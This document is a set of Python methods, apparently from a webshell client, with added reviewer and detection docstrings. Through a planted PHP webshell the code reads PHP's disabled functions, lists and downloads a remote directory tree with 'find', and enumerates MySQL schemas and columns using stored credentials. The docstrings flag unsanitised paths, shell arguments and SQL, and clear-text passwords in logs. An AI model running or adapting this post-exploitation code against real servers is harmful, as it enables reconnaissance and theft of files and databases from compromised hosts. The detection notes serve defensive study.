Beispiel #1
 def get_disabled_functions(self):
     """Report the PHP ``disable_functions`` setting of the remote host.

     A non-empty list already held in ``self.disabled_functions`` is logged
     from that cache and no request is made.  Otherwise the PHP statement
     ``echo ini_get('disable_functions');`` is passed to
     ``self.php_code_exec_token`` and the comma-separated reply is stored on
     the instance and logged.  The method always returns ``None``.

     Detection note: a request whose evaluated PHP contains
     ``ini_get('disable_functions')`` is configuration reconnaissance; the
     literal is a reasonable string to alert on in web-server, WAF and PHP
     audit logs.
     """
     cached = self.disabled_functions
     if len(cached) > 0:
         Log.success("Disabled functions : \n%s" % list2string(cached, "\t[", "]\n"))
         return

     # reply[0] is used as the success flag, reply[1] as the output or error text.
     reply = self.php_code_exec_token("echo ini_get('disable_functions');")
     if not reply[0]:
         Log.error("Error occured! %s" % reply[1])
         return

     if reply[1] == "":
         # An empty list is stored, so the next call queries the host again.
         Log.warning("No function disabled!")
         self.disabled_functions = []
         return

     # NOTE(review): the final field of the split is always discarded. The
     # PHP snippet itself emits no trailing comma, so unless
     # php_code_exec_token appends one the last entry is lost -- confirm.
     self.disabled_functions = reply[1].split(",")[0:-1]
     Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
Beispiel #2
 def download_advanced(self, path, args):
     """Copy a remote directory tree into a local folder derived from the URL.

     The local base is ``get_domain(self.url)``.  Every directory returned by
     ``self.get_all_directories(path)`` is created under it, then the output
     of ``find <path> <args>`` (run through ``self.auto_exec``) is treated as
     one file name per line and each entry is fetched with
     ``self.download_base``.  Returns ``None``.

     Security notes for reviewers:

     * Directory and file names come from the remote host and are joined to
       the local base by plain string concatenation, with no normalisation.
       A name containing ``..`` segments can therefore resolve outside the
       base directory.  NOTE(review): resolve each local path and reject
       anything that does not stay under the base before ``os.makedirs`` or
       the download.
     * ``path`` and ``args`` are formatted into the command string unquoted;
       presumably the string is interpreted by a shell on the remote side --
       confirm, and quote the values if so.
     """
     local_base = get_domain(self.url)

     # Step 1: recreate the remote directory layout locally.
     remote_dirs = self.get_all_directories(path)
     Log.success("Directories : \n%s" %
                 list2string(remote_dirs, "\t[", "]\n"))
     Log.info("Create directories locally...")
     for remote_dir in remote_dirs:
         local_dir = local_base + remote_dir
         Log.info("Creating : [%s]" % (local_dir))
         try:
             os.makedirs(local_dir)
         except Exception as err:
             # Best effort: an existing directory (or any other failure) is
             # logged and the loop carries on.
             Log.error(str(err))

     # Step 2: list the files, then fetch them one by one.
     Log.info("Listing all files...")
     listing = self.auto_exec("find %s %s" % (path, args))
     if not listing[0]:
         Log.error("Listing files error!")
         return

     Log.success("Listing files success!")
     # The output ends with a newline, so the last split element is dropped.
     for remote_file in listing[1].split("\n")[0:-1]:
         local_file = local_base + remote_file
         Log.info("Downloading %s to %s" % (remote_file, local_file))
         self.download_base(remote_file, local_file)
Beispiel #3
 def get_databases(self):
     """List the MySQL schemas visible to the configured account.

     A non-empty ``self.databases`` is logged from the cache and nothing is
     sent.  Otherwise a PHP snippet is built that connects with
     ``self.ip`` / ``self.username`` / ``self.password``, selects
     ``schema_name`` from ``information_schema.schemata`` and echoes each
     name followed by a comma.  The snippet is run through
     ``self.webshell.php_code_exec_token`` and the parsed names are stored
     on ``self.databases`` and logged.  Returns ``None``.

     Security notes for reviewers:

     * The generated code, which embeds the database password in clear
       text, is written to the log by ``Log.info``.  NOTE(review): redact
       the credential before logging.
     * Host, user and password are substituted into single-quoted PHP
       literals without escaping, so a quote or backslash in any of them
       changes the generated code.
     """
     known = self.databases
     if len(known) > 0:
         Log.success("Database : \n" +
                     list2string(known, "=> [", "]\n"))
         return

     php_template = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('information_schema');$s='select schema_name from information_schema.schemata';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();"
     code = php_template % (self.ip, self.username, self.password)
     Log.info("Executing : \n%s" % code)

     reply = self.webshell.php_code_exec_token(code)
     if not reply[0]:
         Log.error("Error occured!")
         return

     # Every name is echoed with a trailing comma, so the split ends with an
     # empty field that is dropped here.
     schema_names = reply[1].split(",")[0:-1]
     self.databases = schema_names
     Log.success("Database : \n" +
                 list2string(schema_names, "=> [", "]\n"))
Beispiel #4
 def get_columns_from_table(self, tablename, database):
     """Log the column names of one table.

     Builds a PHP snippet that connects with ``self.ip`` /
     ``self.username`` / ``self.password``, selects ``database`` and reads
     ``column_name`` from ``information_schema.columns`` for ``tablename``,
     echoing each name followed by a comma.  The snippet is run through
     ``self.webshell.php_code_exec_token``; the parsed names are logged and
     not stored.  Returns ``None``.

     Security notes for reviewers:

     * ``tablename`` is placed inside a double-quoted SQL literal and
       ``database`` inside a single-quoted PHP literal, both without
       escaping: this is string-built SQL and code.  NOTE(review): validate
       both against an identifier allow-list before formatting.
     * The generated code, including the clear-text database password, is
       written to the log by ``Log.info``.
     """
     php_template = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('%s');$s='select column_name from information_schema.columns where table_name = \"%s\"';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();"
     code = php_template % (
         self.ip, self.username, self.password, database, tablename)
     Log.info("Executing : \n%s" % code)

     reply = self.webshell.php_code_exec_token(code)
     if not reply[0]:
         Log.error("Error occured!")
         return

     # Drop the empty field left by the trailing comma of the echoed list.
     column_names = reply[1].split(",")[0:-1]
     Log.success("Columns : \n" + list2string(column_names, "=> [", "]\n"))